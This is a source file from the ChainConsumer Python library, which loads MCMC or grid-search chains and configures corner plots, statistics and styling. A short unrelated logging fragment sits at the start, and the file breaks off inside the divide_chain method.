logger.error('Feature view function not found. Please implement the function in '
'ComplexFeatureService class.')
except Exception as e:
logger.error(e)
finally:
pass | PypiClean |
/ChainConsumer-0.34.0.tar.gz/ChainConsumer-0.34.0/chainconsumer/chainconsumer.py | import numpy as np
import pandas as pd
import logging
from .comparisons import Comparison
from .diagnostic import Diagnostic
from .plotter import Plotter
from .helpers import get_bins
from .analysis import Analysis
from .colors import Colors
from .chain import Chain
__all__ = ["ChainConsumer"]
class ChainConsumer(object):
""" A class for consuming chains produced by an MCMC walk. Or grid searches. To make plots,
figures, tables, diagnostics, you name it.
"""
__version__ = "0.34.0"
def __init__(self):
logging.basicConfig(level=logging.INFO)
self._logger = logging.getLogger("chainconsumer")
self.color_finder = Colors()
self._all_colours = self.color_finder.get_default()
self._cmaps = ["viridis", "inferno", "hot", "Blues", "Greens", "Greys"]
self._linestyles = ["-", "--", ":"]
self.chains = []
self._all_parameters = []
self._default_parameters = None
self._init_params()
self._gauss_mode = "reflect"
self._configured = False
self._num_configure_calls = 0
self.plotter = Plotter(self)
self.diagnostic = Diagnostic(self)
self.comparison = Comparison(self)
self.analysis = Analysis(self)
def _init_params(self):
self.config = {}
self.config_truth = {}
self._configured = False
self._configured_truth = False
def get_mcmc_chains(self):
return [c for c in self.chains if c.mcmc_chain]
def add_chain(
self,
chain,
parameters=None,
name=None,
weights=None,
posterior=None,
walkers=None,
grid=False,
num_eff_data_points=None,
num_free_params=None,
color=None,
linewidth=None,
linestyle=None,
kde=None,
shade=None,
shade_alpha=None,
power=None,
marker_style=None,
marker_size=None,
marker_alpha=None,
plot_contour=None,
plot_point=None,
show_as_1d_prior=None,
statistics=None,
cloud=None,
shade_gradient=None,
bar_shade=None,
bins=None,
smooth=None,
color_params=None,
plot_color_params=None,
cmap=None,
num_cloud=None,
zorder=None,
shift_params=None,
):
r""" Add a chain to the consumer.
Parameters
----------
chain : str|ndarray|dict|pandas.DataFrame
The chain to load. Normally a ``numpy.ndarray``. If a string is found, it
interprets the string as a filename and attempts to load it in using pandas.read_csv. If a ``dict``
is passed in, it assumes the dict has keys of parameter names and values of
an array of samples. Notice that using a dictionary puts the order of
parameters in the output under the control of the python ``dict.keys()`` function.
If you passed ``grid`` is set, you can pass in the parameter ranges in list form. If you pass
a DataFrame, I will look for a "weight" and "posterior" column by default. If they are
called something different, extract them and pass them directly into weights and posterior.
parameters : list[str], optional
A list of parameter names, one for each column (dimension) in the chain. This parameter
should remain ``None`` if a dictionary is given as ``chain``, as the parameter names
are taken from the dictionary keys.
name : str, optional
The name of the chain. Used when plotting multiple chains at once.
weights : ndarray, optional
If given, uses this array to weight the samples in chain
posterior : ndarray, optional
If given, records the log posterior for each sample in the chain
walkers : int, optional
How many walkers went into creating the chain. Each walker should
contribute the same number of steps, and should appear in contiguous
blocks in the final chain.
grid : boolean, optional
Whether the input is a flattened chain from a grid search instead of a Monte-Carlo
chains. Note that when this is set, `walkers` should not be set, and `weights` should
be set to the posterior evaluation for the grid point. **Be careful** when using
a coarse grid of setting a high smoothing value, as this may oversmooth the posterior
surface and give unreasonably large parameter bounds.
num_eff_data_points : int|float, optional
The number of effective (independent) data points used in the model fitting. Not required
for plotting, but required if loading in multiple chains to perform model comparison.
num_free_params : int, optional
The number of degrees of freedom in your model. Not required for plotting, but required if
loading in multiple chains to perform model comparison.
color : str(hex), optional
Provide a colour for the chain. Can be used instead of calling `configure` for convenience.
linewidth : float, optional
Provide a line width to plot the contours. Can be used instead of calling `configure` for convenience.
linestyle : str, optional
Provide a line style to plot the contour. Can be used instead of calling `configure` for convenience.
kde : bool|float, optional
Set the `kde` value for this specific chain. Can be used instead of calling `configure` for convenience.
shade : booloptional
If set, overrides the default behaviour and plots filled contours or not. If a list of
bools is passed, you can turn shading on or off for specific chains.
shade_alpha : float, optional
Filled contour alpha value. Can be used instead of calling `configure` for convenience.
power : float, optional
The power to raise the posterior surface to. Useful for inflating or deflating uncertainty for debugging.
marker_style : str|, optional
The marker style to use when plotting points. Defaults to `'.'`
marker_size : numeric|, optional
Size of markers, if plotted. Defaults to `20`.
marker_alpha : numeric, optional
The alpha values when plotting markers.
plot_contour : bool, optional
Whether to plot the whole contour (as opposed to a point). Defaults to true for less than
25 concurrent chains.
plot_point : bool, optional
Whether to plot a maximum likelihood point. Defaults to true for more then 24 chains.
show_as_1d_prior : bool, optional
Showing as a 1D prior will show the 1D histograms, but won't plot the 2D contours.
statistics : string, optional
Which sort of statistics to use. Defaults to `"max"` for maximum likelihood
statistics. Other available options are `"mean"`, `"cumulative"`, `"max_symmetric"`,
`"max_closest"` and `"max_central"`. In the
very, very rare case you want to enable different statistics for different
chains, you can pass in a list of strings.
cloud : bool, optional
If set, overrides the default behaviour and plots the cloud or not shade_gradient :
bar_shade : bool, optional
If set to true, shades in confidence regions in under histogram. By default
this happens if you less than 3 chains, but is disabled if you are comparing
more chains. You can pass a list if you wish to shade some chains but not others.
bins : int|float, optional
The number of bins to use. By default uses :math:`\frac{\sqrt{n}}{10}`, where
:math:`n` are the number of data points. Giving an integer will set the number
of bins to the given value. Giving a float will scale the number of bins, such
that giving ``bins=1.5`` will result in using :math:`\frac{1.5\sqrt{n}}{10}` bins.
Note this parameter is most useful if `kde=False` is also passed, so you
can actually see the bins and not a KDE. smooth :
color_params : str, optional
The name of the parameter to use for the colour scatter. Defaults to none, for no colour. If set
to 'weights', 'log_weights', or 'posterior' (without the quotes), and that is not a parameter in the chain,
it will respectively use the weights, log weights, or posterior, to colour the points.
plot_color_params : bool, optional
Whether or not the colour parameter should also be plotted as a posterior surface.
cmaps : str, optional
The matplotlib colourmap to use in the `colour_param`. If you have multiple `color_param`s, you can
specific a different cmap for each variable. By default ChainConsumer will cycle between several
cmaps.
num_cloud : int, optional
The number of scatter points to show when enabling `cloud` or setting one of the parameters
to colour scatter. Defaults to 15k per chain.
zorder : int, optional
The zorder to pass to `matplotlib` when plotting to determine visual order in the plot.
shift_params : dict|list, optional
Shifts the parameters specify to the numeric values. Useful to shift contours to the same location to perform blinded
uncertainty comparisons.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
is_dict = False
assert chain is not None, "You cannot have a chain of None"
if isinstance(chain, str):
if chain.lower().endswith(".npy"):
chain = np.load(chain)
else:
chain = pd.read_csv(chain)
elif isinstance(chain, dict):
assert parameters is None, "You cannot pass a dictionary and specify parameter names"
is_dict = True
parameters = list(chain.keys())
chain = np.array([chain[p] for p in parameters]).T
elif isinstance(chain, list):
chain = np.array(chain).T
if isinstance(chain, pd.DataFrame):
assert parameters is None, "You cannot pass a DataFrame and use parameter names, we're using the columns names"
parameters = list(chain.columns)
if "weight" in parameters:
weights = chain["weight"]
if "posterior" in parameters:
posterior = chain["posterior"]
parameters = [p for p in parameters if p not in ["weight", "posterior"]]
chain = chain[parameters].to_numpy()
if grid:
assert walkers is None, "If grid is set, walkers should not be"
assert weights is not None, "If grid is set, you need to supply weights"
if len(weights.shape) > 1:
assert not is_dict, (
"We cannot construct a meshgrid from a dictionary, as the parameters" "are no longer ordered. Please pass in a flattened array instead."
)
self._logger.info("Constructing meshgrid for grid results")
meshes = np.meshgrid(*[u for u in chain.T], indexing="ij")
chain = np.vstack([m.flatten() for m in meshes]).T
weights = weights.flatten()
assert weights.size == chain[:, 0].size, "Error, given weight array size disagrees with parameter sampling"
if len(chain.shape) == 1:
chain = chain[None].T
if name is None:
name = "Chain %d" % len(self.chains)
if power is not None:
assert isinstance(power, int) or isinstance(power, float), "Power should be numeric, but is %s" % type(power)
if self._default_parameters is None and parameters is not None:
self._default_parameters = parameters
if parameters is None:
if self._default_parameters is not None:
assert chain.shape[1] == len(self._default_parameters), "Chain has %d dimensions, but default parameters have %d dimensions" % (
chain.shape[1],
len(self._default_parameters),
)
parameters = self._default_parameters
self._logger.debug("Adding chain using default parameters")
else:
self._logger.debug("Adding chain with no parameter names")
parameters = ["%d" % x for x in range(chain.shape[1])]
else:
self._logger.debug("Adding chain with defined parameters")
assert len(parameters) <= chain.shape[1], "Have only %d columns in chain, but have been given %d parameters names! " "Please double check this." % (
chain.shape[1],
len(parameters),
)
for p in parameters:
if p not in self._all_parameters:
self._all_parameters.append(p)
if shift_params is not None:
if isinstance(shift_params, list):
shift_params = dict([(p, s) for p, s in zip(parameters, shift_params)])
for key in shift_params.keys():
if key not in parameters:
self._logger.warning("Warning, shift parameter %s is not in list of parameters %s" % (key, parameters))
# Sorry, no KDE for you on a grid.
if grid:
kde = None
if color is not None:
color = self.color_finder.get_formatted([color])[0]
c = Chain(
chain,
parameters,
name,
weights=weights,
posterior=posterior,
walkers=walkers,
grid=grid,
num_free_params=num_free_params,
num_eff_data_points=num_eff_data_points,
color=color,
linewidth=linewidth,
linestyle=linestyle,
kde=kde,
shade_alpha=shade_alpha,
power=power,
marker_style=marker_style,
marker_size=marker_size,
marker_alpha=marker_alpha,
plot_contour=plot_contour,
plot_point=plot_point,
show_as_1d_prior=show_as_1d_prior,
statistics=statistics,
cloud=cloud,
shade=shade,
shade_gradient=shade_gradient,
bar_shade=bar_shade,
bins=bins,
smooth=smooth,
color_params=color_params,
plot_color_params=plot_color_params,
cmap=cmap,
num_cloud=num_cloud,
zorder=zorder,
shift_params=shift_params,
)
self.chains.append(c)
self._init_params()
return self
def add_covariance(self, mean, covariance, parameters=None, name=None, **kwargs):
r""" Generate samples as per mean and covariance supplied. Useful for Fisher matrix forecasts.
Parameters
----------
mean : list|np.ndarray
The an array of mean values.
covariance : list|np.ndarray
The 2D array describing the covariance. Dimensions should agree with the `mean` input.
parameters : list[str], optional
A list of parameter names, one for each column (dimension) in the mean array.
name : str, optional
The name of the chain. Used when plotting multiple chains at once.
kwargs :
Extra arguments about formatting - identical to what you would find in `add_chain`. `linewidth`, `color`,
etc.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
chain = np.random.multivariate_normal(mean, covariance, size=1000000)
self.add_chain(chain, parameters=parameters, name=name, **kwargs)
self.chains[-1].mcmc_chain = False # So we dont plot this when looking at walks, etc
return self
def add_marker(
self, location, parameters=None, name=None, color=None, marker_size=None, marker_style=None, marker_alpha=None,
):
r""" Add a marker to the plot at the given location.
Parameters
----------
location : list|np.ndarray
The coordinates to place the marker
parameters : list[str], optional
A list of parameter names, one for each column (dimension) in the mean array.
name : str, optional
The name of the chain. Used when plotting multiple chains at once.
color : str(hex), optional
Provide a colour for the chain. Can be used instead of calling `configure` for convenience.
marker_style : str|, optional
The marker style to use when plotting points. Defaults to `'.'`
marker_size : numeric|, optional
Size of markers, if plotted. Defaults to `20`.
marker_alpha : numeric, optional
The alpha values when plotting markers.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
chain = np.vstack((location, location))
posterior = np.array([0, 1])
self.add_chain(
chain,
parameters=parameters,
posterior=posterior,
name=name,
color=color,
marker_size=marker_size,
marker_style=marker_style,
marker_alpha=marker_alpha,
plot_point=True,
plot_contour=False,
)
self.chains[-1].mcmc_chain = False # So we dont plot this when looking at walks, etc
return self
def remove_chain(self, chain=-1):
r""" Removes a chain from ChainConsumer.
Calling this will require any configurations set to be redone!
Parameters
----------
chain : int|str, list[str|int]
The chain(s) to remove. You can pass in either the chain index, or the chain name, to remove it.
By default removes the last chain added.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
if isinstance(chain, str) or isinstance(chain, int):
chain = [chain]
chain = sorted([i for c in chain for i in self._get_chain(c)])[::-1]
assert len(chain) == len(list(set(chain))), "Error, you are trying to remove a chain more than once."
for index in chain:
del self.chains[index]
seen = set()
self._all_parameters = [p for c in self.chains for p in c.parameters if not (p in seen or seen.add(p))]
# Need to reconfigure
self._init_params()
return self
def configure(
self,
statistics="max",
max_ticks=5,
plot_hists=True,
flip=True,
serif=False,
sigma2d=False,
sigmas=None,
summary=None,
bins=None,
cmap=None,
colors=None,
linestyles=None,
linewidths=None,
kde=False,
smooth=None,
cloud=None,
shade=None,
shade_alpha=None,
shade_gradient=None,
bar_shade=None,
num_cloud=None,
color_params=None,
plot_color_params=False,
cmaps=None,
plot_contour=None,
plot_point=None,
show_as_1d_prior=None,
global_point=True,
marker_style=None,
marker_size=None,
marker_alpha=None,
usetex=False,
diagonal_tick_labels=True,
label_font_size=12,
tick_font_size=10,
spacing=None,
contour_labels=None,
contour_label_font_size=10,
legend_kwargs=None,
legend_location=None,
legend_artists=None,
legend_color_text=True,
watermark_text_kwargs=None,
summary_area=0.6827,
zorder=None,
stack=False,
): # pragma: no cover
r""" Configure the general plotting parameters common across the bar
and contour plots.
If you do not call this explicitly, the :func:`plot`
method will invoke this method automatically.
Please ensure that you call this method *after* adding all the relevant data to the
chain consumer, as the consume changes configuration values depending on
the supplied data.
Parameters
----------
statistics : string|list[str], optional
Which sort of statistics to use. Defaults to `"max"` for maximum likelihood
statistics. Other available options are `"mean"`, `"cumulative"`, `"max_symmetric"`,
`"max_closest"` and `"max_central"`. In the
very, very rare case you want to enable different statistics for different
chains, you can pass in a list of strings.
max_ticks : int, optional
The maximum number of ticks to use on the plots
plot_hists : bool, optional
Whether to plot marginalised distributions or not
flip : bool, optional
Set to false if, when plotting only two parameters, you do not want it to
rotate the histogram so that it is horizontal.
sigma2d: bool, optional
Defaults to `False`. When `False`, uses :math:`\sigma` levels for 1D Gaussians - ie confidence
levels of 68% and 95%. When `True`, uses the confidence levels for 2D Gaussians, where 1 and 2
:math:`\sigma` represents 39% and 86% confidence levels respectively.
sigmas : np.array, optional
The :math:`\sigma` contour levels to plot. Defaults to [0, 1, 2, 3] for a single chain
and [0, 1, 2] for multiple chains.
serif : bool, optional
Whether to display ticks and labels with serif font.
summary : bool, optional
If overridden, sets whether parameter summaries should be set as axis titles.
Will not work if you have multiple chains
bins : int|float,list[int|float], optional
The number of bins to use. By default uses :math:`\frac{\sqrt{n}}{10}`, where
:math:`n` are the number of data points. Giving an integer will set the number
of bins to the given value. Giving a float will scale the number of bins, such
that giving ``bins=1.5`` will result in using :math:`\frac{1.5\sqrt{n}}{10}` bins.
Note this parameter is most useful if `kde=False` is also passed, so you
can actually see the bins and not a KDE.
cmap : str, optional
Set to the matplotlib colour map you want to use to overwrite the default colours.
Note that this parameter overwrites colours. The `cmaps` parameters is different,
and used when you ask for an extra dimension to be used to colour scatter points.
See the online examples to see the difference.
colors : str(hex)|list[str(hex)], optional
Provide a list of colours to use for each chain. If you provide more chains
than colours, you *will* get the rainbow colour spectrum. If you only pass
one colour, all chains are set to this colour. This probably won't look good.
linestyles : str|list[str], optional
Provide a list of line styles to plot the contours and marginalised
distributions with. By default, this will become a list of solid lines. If a
string is passed instead of a list, this style is used for all chains.
linewidths : float|list[float], optional
Provide a list of line widths to plot the contours and marginalised
distributions with. By default, this is a width of 1. If a float
is passed instead of a list, this width is used for all chains.
kde : bool|float|list[bool|float], optional
Whether to use a Gaussian KDE to smooth marginalised posteriors. If false, uses
bins and linear interpolation, so ensure you have plenty of samples if your
distribution is highly non-gaussian. Due to the slowness of performing a
KDE on all data, it is often useful to disable this before producing final
plots. If float, scales the width of the KDE bandpass manually.
smooth : int|list[int], optional
Defaults to 3. How much to smooth the marginalised distributions using a gaussian filter.
If ``kde`` is set to true, this parameter is ignored. Setting it to either
``0``, ``False`` disables smoothing. For grid data, smoothing
is set to 0 by default, not 3.
cloud : bool|list[bool], optional
If set, overrides the default behaviour and plots the cloud or not
shade : bool|list[bool] optional
If set, overrides the default behaviour and plots filled contours or not. If a list of
bools is passed, you can turn shading on or off for specific chains.
shade_alpha : float|list[float], optional
Filled contour alpha value override. Default is 1.0. If a list is passed, you can set the
shade opacity for specific chains.
shade_gradient : float|list[float], optional
How much to vary colours in different contour levels.
bar_shade : bool|list[bool], optional
If set to true, shades in confidence regions in under histogram. By default
this happens if you less than 3 chains, but is disabled if you are comparing
more chains. You can pass a list if you wish to shade some chains but not others.
num_cloud : int|list[int], optional
The number of scatter points to show when enabling `cloud` or setting one of the parameters
to colour scatter. Defaults to 15k per chain.
color_params : str|list[str], optional
The name of the parameter to use for the colour scatter. Defaults to none, for no colour. If set
to 'weights', 'log_weights', or 'posterior' (without the quotes), and that is not a parameter in the chain,
it will respectively use the weights, log weights, or posterior, to colour the points.
plot_color_params : bool|list[bool], optional
Whether or not the colour parameter should also be plotted as a posterior surface.
cmaps : str|list[str], optional
The matplotlib colourmap to use in the `colour_param`. If you have multiple `color_param`s, you can
specific a different cmap for each variable. By default ChainConsumer will cycle between several
cmaps.
plot_contour : bool|list[bool], optional
Whether to plot the whole contour (as opposed to a point). Defaults to true for less than
25 concurrent chains.
plot_point : bool|list[bool], optional
Whether to plot a maximum likelihood point. Defaults to true for more then 24 chains.
show_as_1d_prior : bool|list[bool], optional
Showing as a 1D prior will show the 1D histograms, but won't plot the 2D contours.
global_point : bool, optional
Whether the point which gets plotted is the global posterior maximum, or the marginalised 2D
posterior maximum. Note that when you use marginalised 2D maximums for the points, you do not
get the 1D histograms. Defaults to `True`, for a global maximum value.
marker_style : str|list[str], optional
The marker style to use when plotting points. Defaults to `'.'`
marker_size : numeric|list[numeric], optional
Size of markers, if plotted. Defaults to `20`.
marker_alpha : numeric|list[numeric], optional
The alpha values when plotting markers.
usetex : bool, optional
Whether or not to parse text as LaTeX in plots.
diagonal_tick_labels : bool, optional
Whether to display tick labels on a 45 degree angle.
label_font_size : int|float, optional
The font size for plot axis labels and axis titles if summaries are configured to display.
tick_font_size : int|float, optional
The font size for the tick labels in the plots.
spacing : float, optional
The amount of spacing to add between plots. Defaults to `None`, which equates to 1.0 for less
than 6 dimensions and 0.0 for higher dimensions.
contour_labels : string, optional
If unset do not plot contour labels. If set to "confidence", label the using confidence
intervals. If set to "sigma", labels using sigma.
contour_label_font_size : int|float, optional
The font size for contour labels, if they are enabled.
legend_kwargs : dict, optional
Extra arguments to pass to the legend api.
legend_location : tuple(int,int), optional
Specifies the subplot in which to locate the legend. By default, this will be (0, -1),
corresponding to the top right subplot if there are more than two parameters,
and the bottom left plot for only two parameters with flip on.
For having the legend in the primary subplot
in the bottom left, set to (-1,0).
legend_artists : bool, optional
Whether to include hide artists in the legend. If all linestyles and line widths are identical,
this will default to false (as only the colours change). Otherwise it will be true.
legend_color_text : bool, optional
Whether to colour the legend text.
watermark_text_kwargs : dict, optional
Options to pass to the fontdict property when generating text for the watermark.
summary_area : float, optional
The confidence interval used when generating parameter summaries. Defaults to 1 sigma, aka 0.6827
zorder : int, optional
The zorder to pass to `matplotlib` to determine visual ordering when plotting.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
# Warn the user if configure has been invoked multiple times
self._num_configure_calls += 1
if self._num_configure_calls > 1:
self._logger.warning("Configure has been called %d times - this is not good - it should be once!" % self._num_configure_calls)
self._logger.warning("To avoid this, load your chains in first, then call analysis/plotting methods")
# Dirty way of ensuring overrides happen when requested
l = locals()
explicit = []
for k in l.keys():
if l[k] is not None:
explicit.append(k)
if k.endswith("s"):
explicit.append(k[:-1])
self._init_params()
num_chains = len(self.chains)
assert cmap is None or colors is None, "You cannot both ask for cmap colours and then give explicit colours"
# Determine statistics
assert statistics is not None, "statistics should be a string or list of strings!"
if isinstance(statistics, str):
assert statistics in list(Analysis.summaries), "statistics %s not recognised. Should be in %s" % (statistics, Analysis.summaries,)
statistics = [statistics.lower()] * len(self.chains)
elif isinstance(statistics, list):
for i, l in enumerate(statistics):
statistics[i] = l.lower()
else:
raise ValueError("statistics is not a string or a list!")
# Determine KDEs
if isinstance(kde, bool) or isinstance(kde, float):
kde = [False if c.grid else kde for c in self.chains]
kde_override = [c.kde for c in self.chains]
kde = [c2 if c2 is not None else c1 for c1, c2 in zip(kde, kde_override)]
# Determine bins
if bins is None:
bins = get_bins(self.chains)
elif isinstance(bins, list):
bins = [b2 if isinstance(b2, int) else np.floor(b2 * b1) for b1, b2 in zip(get_bins(self.chains), bins)]
elif isinstance(bins, float):
bins = [np.floor(b * bins) for b in get_bins(self.chains)]
elif isinstance(bins, int):
bins = [bins] * len(self.chains)
else:
raise ValueError("bins value is not a recognised class (float or int)")
# Determine smoothing
if smooth is None:
smooth = [0 if c.grid or k else 3 for c, k in zip(self.chains, kde)]
else:
if smooth is not None and not smooth:
smooth = 0
if isinstance(smooth, list):
smooth = [0 if k else s for s, k in zip(smooth, kde)]
else:
smooth = [0 if k else smooth for k in kde]
# Determine color parameters
if color_params is None:
color_params = [None] * num_chains
else:
if isinstance(color_params, str):
color_params = [color_params if color_params in cs.parameters + ["log_weights", "weights", "posterior"] else None for cs in self.chains]
color_params = [None if c == "posterior" and self.chains[i].posterior is None else c for i, c in enumerate(color_params)]
elif isinstance(color_params, list) or isinstance(color_params, tuple):
for c, chain in zip(color_params, self.chains):
p = chain.parameters
if c is not None:
assert c in p, "Color parameter %s not in parameters %s" % (c, p)
# Determine if we should plot color parameters
if isinstance(plot_color_params, bool):
plot_color_params = [plot_color_params] * len(color_params)
# Determine cmaps
if cmaps is None:
param_cmaps = {}
cmaps = []
i = 0
for cp in color_params:
if cp is None:
cmaps.append(None)
elif cp in param_cmaps:
cmaps.append(param_cmaps[cp])
else:
param_cmaps[cp] = self._cmaps[i]
cmaps.append(self._cmaps[i])
i = (i + 1) % len(self._cmaps)
# Determine colours
if colors is None:
if cmap:
colors = self.color_finder.get_colormap(num_chains, cmap)
else:
if num_chains > len(self._all_colours):
num_needed_colours = np.sum([c is None for c in color_params])
colour_list = self.color_finder.get_colormap(num_needed_colours, "inferno")
else:
colour_list = self._all_colours
colors = []
ci = 0
for c in color_params:
if c:
colors.append("#000000")
else:
colors.append(colour_list[ci])
ci += 1
elif isinstance(colors, str):
colors = [colors] * len(self.chains)
colors = self.color_finder.get_formatted(colors)
# Determine linestyles
if linestyles is None:
i = 0
linestyles = []
for c in color_params:
if c is None:
linestyles.append(self._linestyles[0])
else:
linestyles.append(self._linestyles[i])
i = (i + 1) % len(self._linestyles)
elif isinstance(linestyles, str):
linestyles = [linestyles] * len(self.chains)
# Determine linewidths
if linewidths is None:
linewidths = [1.0] * len(self.chains)
elif isinstance(linewidths, float) or isinstance(linewidths, int):
linewidths = [linewidths] * len(self.chains)
# Determine clouds
if cloud is None:
cloud = False
cloud = [cloud or c is not None for c in color_params]
# Determine cloud points
if num_cloud is None:
num_cloud = 30000
if isinstance(num_cloud, int) or isinstance(num_cloud, float):
num_cloud = [int(num_cloud)] * num_chains
# Should we shade the contours
if shade is None:
if shade_alpha is None:
shade = num_chains <= 3
else:
shade = True
if isinstance(shade, bool):
# If not overridden, do not shade chains with colour scatter points
shade = [shade and c is None for c in color_params]
# Modify shade alpha based on how many chains we have
if shade_alpha is None:
if num_chains == 1:
if contour_labels is not None:
shade_alpha = 0.75
else:
shade_alpha = 1.0
else:
shade_alpha = 1.0 / np.sqrt(num_chains)
# Decrease the shading amount if there are colour scatter points
if isinstance(shade_alpha, float) or isinstance(shade_alpha, int):
shade_alpha = [shade_alpha if c is None else 0.25 * shade_alpha for c in color_params]
if shade_gradient is None:
shade_gradient = 1.0
if isinstance(shade_gradient, float):
shade_gradient = [shade_gradient] * num_chains
elif isinstance(shade_gradient, list):
assert len(shade_gradient) == num_chains, "Have %d shade_gradient but % chains" % (len(shade_gradient), num_chains,)
contour_over_points = num_chains < 20
if plot_contour is None:
plot_contour = [contour_over_points if chain.posterior is not None else True for chain in self.chains]
elif isinstance(plot_contour, bool):
plot_contour = [plot_contour] * num_chains
if plot_point is None:
plot_point = [not contour_over_points] * num_chains
elif isinstance(plot_point, bool):
plot_point = [plot_point] * num_chains
if show_as_1d_prior is None:
show_as_1d_prior = [not contour_over_points] * num_chains
elif isinstance(show_as_1d_prior, bool):
show_as_1d_prior = [show_as_1d_prior] * num_chains
if marker_style is None:
marker_style = ["."] * num_chains
elif isinstance(marker_style, str):
marker_style = [marker_style] * num_chains
if marker_size is None:
marker_size = [20] * num_chains
elif isinstance(marker_style, (int, float)):
marker_size = [marker_size] * num_chains
if marker_alpha is None:
marker_alpha = [1.0] * num_chains
elif isinstance(marker_alpha, (int, float)):
marker_alpha = [marker_alpha] * num_chains
# Figure out if we should display parameter summaries
if summary is not None:
summary = summary and num_chains == 1
# Figure out bar shading
if bar_shade is None:
bar_shade = num_chains <= 3
if isinstance(bar_shade, bool):
bar_shade = [bar_shade] * num_chains
if zorder is None:
zorder = [1] * num_chains
# Figure out how many sigmas to plot
if sigmas is None:
if num_chains == 1:
sigmas = np.array([0, 1, 2])
else:
sigmas = np.array([0, 1, 2])
if sigmas[0] != 0:
sigmas = np.concatenate(([0], sigmas))
sigmas = np.sort(sigmas)
if contour_labels is not None:
assert isinstance(contour_labels, str), "contour_labels parameter should be a string"
contour_labels = contour_labels.lower()
assert contour_labels in ["sigma", "confidence",], "contour_labels should be either sigma or confidence"
assert isinstance(contour_label_font_size, int) or isinstance(contour_label_font_size, float), "contour_label_font_size needs to be numeric"
if legend_artists is None:
legend_artists = len(set(linestyles)) > 1 or len(set(linewidths)) > 1
if legend_kwargs is not None:
assert isinstance(legend_kwargs, dict), "legend_kwargs should be a dict"
else:
legend_kwargs = {}
if num_chains < 3:
labelspacing = 0.5
elif num_chains == 3:
labelspacing = 0.2
else:
labelspacing = 0.15
legend_kwargs_default = {
"labelspacing": labelspacing,
"loc": "upper right",
"frameon": False,
"fontsize": label_font_size,
"handlelength": 1,
"handletextpad": 0.2,
"borderaxespad": 0.0,
}
legend_kwargs_default.update(legend_kwargs)
watermark_text_kwargs_default = {
"color": "#333333",
"alpha": 0.7,
"verticalalignment": "center",
"horizontalalignment": "center",
}
if watermark_text_kwargs is None:
watermark_text_kwargs = {}
watermark_text_kwargs_default.update(watermark_text_kwargs)
assert isinstance(summary_area, float), "summary_area needs to be a float, not %s!" % type(summary_area)
assert summary_area > 0, "summary_area should be a positive number, instead is %s!" % summary_area
assert summary_area < 1, "summary_area must be less than unity, instead is %s!" % summary_area
assert isinstance(global_point, bool), "global_point should be a bool"
# List options
for i, c in enumerate(self.chains):
try:
c.update_unset_config("statistics", statistics[i], override=explicit)
c.update_unset_config("color", colors[i], override=explicit)
c.update_unset_config("linestyle", linestyles[i], override=explicit)
c.update_unset_config("linewidth", linewidths[i], override=explicit)
c.update_unset_config("cloud", cloud[i], override=explicit)
c.update_unset_config("shade", shade[i], override=explicit)
c.update_unset_config("shade_alpha", shade_alpha[i], override=explicit)
c.update_unset_config("shade_gradient", shade_gradient[i], override=explicit)
c.update_unset_config("bar_shade", bar_shade[i], override=explicit)
c.update_unset_config("bins", bins[i], override=explicit)
c.update_unset_config("kde", kde[i], override=explicit)
c.update_unset_config("smooth", smooth[i], override=explicit)
c.update_unset_config("color_params", color_params[i], override=explicit)
c.update_unset_config("plot_color_params", plot_color_params[i], override=explicit)
c.update_unset_config("cmap", cmaps[i], override=explicit)
c.update_unset_config("num_cloud", num_cloud[i], override=explicit)
c.update_unset_config("marker_style", marker_style[i], override=explicit)
c.update_unset_config("marker_size", marker_size[i], override=explicit)
c.update_unset_config("marker_alpha", marker_alpha[i], override=explicit)
c.update_unset_config("plot_contour", plot_contour[i], override=explicit)
c.update_unset_config("plot_point", plot_point[i], override=explicit)
c.update_unset_config("show_as_1d_prior", show_as_1d_prior[i], override=explicit)
c.update_unset_config("zorder", zorder[i], override=explicit)
c.config["summary_area"] = summary_area
except IndentationError as e:
print(
"Index error when assigning chain properties, make sure you "
"have enough properties set for the number of chains you have loaded! "
"See the stack trace for which config item has the wrong number of entries."
)
raise e
# Non list options
self.config["sigma2d"] = sigma2d
self.config["sigmas"] = sigmas
self.config["summary"] = summary
self.config["flip"] = flip
self.config["serif"] = serif
self.config["plot_hists"] = plot_hists
self.config["max_ticks"] = max_ticks
self.config["usetex"] = usetex
self.config["diagonal_tick_labels"] = diagonal_tick_labels
self.config["label_font_size"] = label_font_size
self.config["tick_font_size"] = tick_font_size
self.config["spacing"] = spacing
self.config["contour_labels"] = contour_labels
self.config["contour_label_font_size"] = contour_label_font_size
self.config["legend_location"] = legend_location
self.config["legend_kwargs"] = legend_kwargs_default
self.config["legend_artists"] = legend_artists
self.config["legend_color_text"] = legend_color_text
self.config["watermark_text_kwargs"] = watermark_text_kwargs_default
self.config["global_point"] = global_point
self._configured = True
return self
def configure_truth(self, **kwargs): # pragma: no cover
r""" Configure the arguments passed to the ``axvline`` and ``axhline``
methods when plotting truth values.
If you do not call this explicitly, the :func:`plot` method will
invoke this method automatically.
Recommended to set the parameters ``linestyle``, ``color`` and/or ``alpha``
if you want some basic control.
Default is to use an opaque black dashed line.
Parameters
----------
kwargs : dict
The keyword arguments to unwrap when calling ``axvline`` and ``axhline``.
Returns
-------
ChainConsumer
Itself, to allow chaining calls.
"""
if kwargs.get("ls") is None and kwargs.get("linestyle") is None:
kwargs["ls"] = "--"
# kwargs["dashes"] = (3, 3)
if kwargs.get("lw") is None and kwargs.get("linewidth") is None:
kwargs["linewidth"] = 1
if kwargs.get("color") is None:
kwargs["color"] = "#000000"
if kwargs.get("zorder") is None:
kwargs["zorder"] = 100
self.config_truth = kwargs
self._configured_truth = True
return self
def divide_chain(self, chain=0):
r"""
Returns a ChainConsumer instance containing all the walks of a given chain
as individual chains themselves.
This method might be useful if, for example, your chain was made using
MCMC with 4 walkers. To check the sampling of all 4 walkers agree, you could
call this to get a ChainConsumer instance with one chain for ech of the
four walks. If you then plot, hopefully all four contours
you would see agree.
Parameters
----------
chain : int|str, optional
The index or name of the chain you want divided
Returns
-------
ChainConsumer
A new ChainConsumer instance with the same settings as the parent instance, containing
``num_walker`` chains.
"""
indexes = self._get_chain(chain)
con = ChainConsumer()
for index in indexes:
chain = self.chains[index]
assert chain.walkers is not None, "The chain you have selected was not added with any walkers!"
num_walkers = chain.walkers
data = np.split(chain.chain, num_walkers)
ws = np.split(chain.weights, num_walkers)
